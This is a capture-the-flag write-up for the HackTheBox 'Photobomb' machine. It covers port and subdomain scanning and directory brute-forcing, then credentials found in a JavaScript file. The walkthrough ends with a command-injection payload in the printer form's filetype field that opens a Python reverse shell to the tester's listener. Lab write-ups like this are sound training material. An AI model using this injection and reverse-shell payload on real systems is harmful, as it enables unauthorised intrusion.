CTF Photobomb

Benjamin

10-10-2021

CTF › HackTheBox

Linux, RCE

Rustscan

1	rustscan -a photobomb.htb --ulimit 5000

Output:

1 2	Open 10.129.202.206:22 Open 10.129.202.206:80

wfuzz

Subdomain

1	wfuzz -c -f subdomains -w /usr/share/wordlists/wfuzz/others/subdomains.txt -u 'http://photobomb.htb' -H "Host: FUZZ.photobomb.htb" --sc 200

No subdomain

dig

1	dig axfr photobomb.htb @photobomb.htb

Nothing

Gobuster

1	gobuster dir -u http://photobomb.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html --wildcard switch \|grep "Status: 200"

Website

Internal port

I was trying te determin if it the website can andle php or html, and I found this.
The image don’t display.
Also, Sinatra should be a user.

SSTI ?

1	http://photobomb.htb/{{7*7}}

Source code

In the js file:

this is a username with the password.
http://pH0t0:b0Mb!@photobomb.htb/printer

Download the photos

I cupy the request as curl comand.

curl 'http://photobomb.htb/printer' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://photobomb.htb' -H 'Authorization: Basic cEgwdDA6YjBNYiE=' -H 'Connection: keep-alive' -H 'Referer: http://photobomb.htb/printer' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg&dimensions=3000x2000'

Reverse shell

If I add this in the bodu and listenj with netcat I can spawn a reverse shell.
Listen:

1	nc -nlvp 8645

Connect:

photo=almas-salakhov-VK7TCqcZTlw-unsplash.jpg&filetype=png;export RHOST="10.10.14.93";export RPORT=8645;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'&dimensions=1920x1080